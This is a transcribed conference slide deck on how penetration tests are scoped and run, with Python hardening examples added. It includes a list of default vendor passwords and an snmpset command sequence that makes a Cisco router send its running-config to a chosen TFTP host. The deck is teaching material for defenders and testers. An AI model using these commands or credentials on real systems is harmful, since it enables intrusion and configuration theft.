Penetration testing What’s this? Dmitry Evteev (Positive Technologies)

Upload: dmitry-evteev

Post on 14-Jan-2015


Page 1: Penetration testing, What’s this?

Penetration testing

What’s this?

Dmitry Evteev (Positive Technologies)

Page 2

Penetration testing internals

Penetration testing != simulation of (un)real attacker activities

Penetration testing != instrumental scanning with manual vulnerability verification

Penetration testing –

• is a set of activities aimed at assessing the current state of security processes;

• is testing of whether protection mechanisms can be bypassed;

• is one of the security audit methods.

Page 3

Methodology

On the one hand, the following best practices are used:

• Open Source Security Testing Methodology Manual (OSSTMM)

• Web Application Security Consortium (WASC)

• Open Web Application Security Project (OWASP)

On the other hand, the following standards are used:

• Center for Internet Security (CIS) guides

• ISO 2700x series standards

Page 4

Abilities

[Diagram: protection mechanisms 1 … N, each marked as bypassed (X); incident management: some activities were detected but not identified as an attack.]

Page 5

Aims

High-level

• Internal policy (pentest as an instrument of pressure)

• Estimation of current security processes

• Required for compliance

Technological

• Get unauthorized access to the internal network from the Internet

• Gain maximum privileges in main infrastructure systems (Active Directory, network hardware, DBMS, ERP, etc.)

• Get access to certain information resources

• Get access to certain data (information)

Page 6

Approaches

Perimeter pentest (with further attacks in the internal network)

• With or without administrator awareness

• Wireless network security analysis

Internal pentest

• From an average user working station

• From a chosen network segment

Testing (security analysis) of a specific information system component

• Black, Grey and White Box

Assessment of employee awareness in information security

Page 7

Real attack VS penetration testing

For the person actually performing it, a pentest is HACKING!

Limitations

• Compliance with Russian Federation legislation

• Limited time

• Minimum impact

• No testing like DDoS

Inconveniences

• Coordination of actions (it can run into a very absurd extreme!)

• Responsibility/Punctuality

Advantages

• No need to hide the activities

• Simplifies the network perimeter identification process

• A possibility to use Grey and White Box methods

Page 8

Instruments

Positive Technologies MaxPatrol

Nmap/dnsenum/dig …

Immunity Canvas (VulnDisco, Agora Pack, VoIP Pack)

Metasploit

THC Hydra/THC PPTP bruter/ncrack …

Cain and Abel/Wireshark

Aircrack

Yersinia

Browser, notepad…

Page 9

The most frequent web application vulnerabilities detected by the “Black Box” method (2009 statistics, http://ptsecurity.ru/analytics.asp)

[Bar chart, 0%–60% scale: share of web applications affected by each vulnerability class. Classes listed: Bruteforce, Vulnerable server …, Predictable resource …, Information Leakage, SQL Injection, Cross Site Scripting. Bar values shown on the slide: 22%, 38%, 21%, 38%, 49%, 27%.]

Page 10

Pentest example: web applications

What is a web application pentest by the Black Box method? (real world)

[Diagram: the auditor working station runs Check 1 … Check N against the web server; vulnerabilities are detected along the way.]

Vulnerability 1: password bruteforce. Impact: access to the application (with limited privileges)

Vulnerability 2: SQL injection. Impact: file reading only (magic quotes option is enabled)

Vulnerability 3: path traversal. Impact: file reading only (potentially LFI)

Vulnerability 4: predictable identifier of an uploaded file. Vulnerability 3 + Vulnerability 4 = Impact: command execution on the server

Next step – FURTHER ATTACK
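The combination of vulnerabilities 3 and 4 is what turns two file-read bugs into command execution: an attacker who can upload a file and guess its name can point a traversal/LFI at it. As an added example, not from the original slides, here is the hardened handling on the application side in Python: user-supplied paths are confined to the upload root lexically, and uploads are stored under unpredictable names instead of a guessable identifier. The upload directory and the file names are constructed assumptions.

```python
import posixpath
import secrets

# Hypothetical upload directory; assumed to live outside the web root and to be
# served without script execution, so a stored file can never run as code.
UPLOAD_ROOT = "/srv/app/uploads"


def resolve_under_root(root: str, user_supplied: str) -> str:
    """Return the absolute path for a user-supplied relative name, or raise.

    Counters Vulnerability 3 (path traversal): absolute paths and any ".."
    sequence that would climb out of ``root`` are rejected lexically, before
    the filesystem is touched. Percent-decoding must already have happened
    (the web framework normally does it), otherwise encoded dots slip through.
    """
    if not user_supplied or posixpath.isabs(user_supplied):
        raise ValueError("absolute or empty path rejected")
    root = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root, user_supplied))
    # commonpath collapses to a parent of root (e.g. "/srv") when the
    # candidate escaped, so equality with root is the containment test.
    if candidate == root or posixpath.commonpath([root, candidate]) != root:
        raise ValueError("path escapes upload root or names the root itself")
    return candidate


def storage_name_for_upload() -> str:
    """Return an unpredictable on-disk name for a new upload.

    Counters Vulnerability 4 (predictable identifier): neither the client's
    file name nor a sequential id is used on disk, so an attacker who uploaded
    a file does not know where to point an LFI at it. The original name is
    kept only as metadata in the database, never in the path.
    """
    return secrets.token_urlsafe(32)


def is_safe_download(root: str, user_supplied: str) -> bool:
    """True if the request would be served, False if the path check blocks it."""
    try:
        resolve_under_root(root, user_supplied)
        return True
    except ValueError:
        return False
```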

Page 11

Weak password problem

The recommended password policy is in place

What is the domain administrator password? (it coincides with the login)

Page 12

Pentest example: Password bruteforce (defaults)

Well known

• admin:123456

• Administrator:P@ssw0rd

SAP

• (DIAG) SAP*: 06071992, PASS

clients (mandants): 000, 001, 066, all new

• (RFC) SAPCPIC: ADMIN

clients (mandants): 000, 001, 066, all new

Oracle

• sys:manager

• sys:change_on_install

Cisco

• Cisco:Cisco

Page 13

Pentest example: Hello, Pavlik :)

snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.2.31337 integer 1

snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.3.31337 integer 4

snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.4.31337 integer 1

snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.5.31337 address <tftp_host>

snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.6.31337 string running-config

snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.14.31337 integer 1

snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.14.31337 integer 6
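The snmpset sequence above works only because the device accepts a guessable read-write community ("private") over SNMPv1 from any source. As an added example, not part of the original deck, the following Python check scans Cisco IOS-style configuration text for exactly that condition; the configuration lines and community names are constructed for the example, and the parser handles only the common `snmp-server community <name> RO|RW [acl]` form.

```python
import re
from typing import Dict, List

# Community strings that ship as defaults or appear in every wordlist;
# the slide's snmpset commands rely on "private" being accepted for writes.
WELL_KNOWN_COMMUNITIES = {"public", "private", "cisco"}

# Common IOS form: snmp-server community <name> RO|RW [<acl-number-or-name>]
# (the "view" and "ipv6" variants are not parsed by this simplified check).
COMMUNITY_RE = re.compile(
    r"^\s*snmp-server\s+community\s+(\S+)\s+(RO|RW)(?:\s+(\S+))?\s*$",
    re.IGNORECASE,
)

# Constructed sample configuration for this example.
SAMPLE_CONFIG = """\
hostname branch-rtr-01
snmp-server community public RO
snmp-server community private RW
snmp-server community n0c-m0nitor RO 10
snmp-server community cfg-mgmt RW 20
access-list 20 permit host 10.0.0.5
"""


def audit_snmp_communities(config_text: str) -> List[Dict[str, object]]:
    """Return one finding per community string that is guessable or grants
    unrestricted write access.

    A RW community without an access-list is the precondition for the
    CISCO-CONFIG-COPY-MIB trick on the slide: anyone who can reach UDP/161
    and guess the string can copy running-config to a TFTP host of their
    choosing. The fix is to remove such strings (or move to SNMPv3 authPriv)
    and to restrict any remaining community with an ACL.
    """
    findings = []
    for line in config_text.splitlines():
        m = COMMUNITY_RE.match(line)
        if not m:
            continue
        community, mode, acl = m.group(1), m.group(2).upper(), m.group(3)
        issues = []
        if community.lower() in WELL_KNOWN_COMMUNITIES:
            issues.append("well-known community string")
        if mode == "RW" and acl is None:
            issues.append("RW access not restricted by an access-list")
        if issues:
            findings.append({"community": community, "mode": mode, "issues": issues})
    return findings
```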

Page 14

The problem of access control

Network access

• Network architecture (DMZ, technological network, user segment, testing environment)

• Remote network access

Data access

• Shared resources (passwords in clear text, data backup copies, other sensitive data)

• Web applications, DBMS, ERP

Page 15

The problem of access control

Division of privileges among administrators

Users with extended privileges

Services (!) with a higher access level than required

General problem of identifier (account) management

Page 16

Pentest example: Use of vulnerabilities

CANVAS && Metasploit

Page 17

Pentest example: Privilege escalation in Active Directory

Version 1: Password bruteforce

Version 2: Vulnerabilities in domain controller services

Version 3: Pass-the-hash attack

Version 4: Create a new user from a domain computer

Version 5: Conduct an ARP cache poisoning attack (for example, hijack an RDP session, downgrade the authentication level to LM)

Version 6: NTLM relay attack

Version 7: Find and restore a domain system state backup (for example, after a successful attack on the backup server)

Version 8: Get extended privileges through other systems (for example, control records in the company’s root DNS)

Version 9: Get extended privileges via other systems’ vulnerabilities (passwords stored with reversible encryption, insecure protocols in use, etc.)

Version N …

Page 18

Pentest example: Security analysis

[Diagram: Head office (servers, network hardware, working stations) and Branch (working stations, servers, network hardware), with the MP server, the auditor working station and the web server; checks run from the auditor station.]

Web server:

• Network scanning

• Password is bruteforced!

• Exploitation of SQL injection

• Command execution on the server

• Privilege gaining

• Attack on internal resources

Internal pentest / audit using pentest results:

• Install MaxPatrol scanner

• Find vulnerabilities

• Exploit vulnerabilities

• Move to the network of the Head office

• Conduct attacks on Head office resources

Get maximum privileges in the whole network!

Page 19

Pentest example: Security analysis

Page 20

Pentest example: Wireless networks

Page 21

Pentest example: Assessment of awareness program efficiency

Send provocative messages via e-mail

Send provocative messages via ICQ (and other IM)

Distribute data media with provocative messages

Question employees

Talks (by telephone, Skype)

Page 22

Pentest example: Example of a set of checks

| Note description | Attack | Monitored events |
|---|---|---|
| A note from authority with an attached executable file. | Spread of network worms; system infection with a Trojan horse. | Open the mailbox; execute the attached file. |
| A note from an internal person with a link to a web site; the link points to an executable file. | Phishing attacks; spread of network worms; system infection with a Trojan horse; attacks through software vulnerabilities. | Open the mailbox; load the file from the web server; execute the file. |
| A note from authority with a link to a web site. | Phishing attacks; spread of network worms; system infection with a Trojan horse; attacks through software vulnerabilities. | Open the mailbox; follow the link. |

Page 23

Pentest example: Assessment of awareness program efficiency

[Chart: share of users that follow the link, after a single pentest versus after regular pentests.]

Page 24

Conclusions

Penetration testing

– is a set of activities that allows an efficient assessment of current security processes

Penetration testing

– is the search for and use of flaws in security processes:

• vulnerability management

• configuration management

• incident management

• security management of web applications, DBMS, ERP, wire and wireless networks, etc.

• etc.

Page 25

Thank you for your attention! Any questions?

[email protected]

http://devteev.blogspot.com/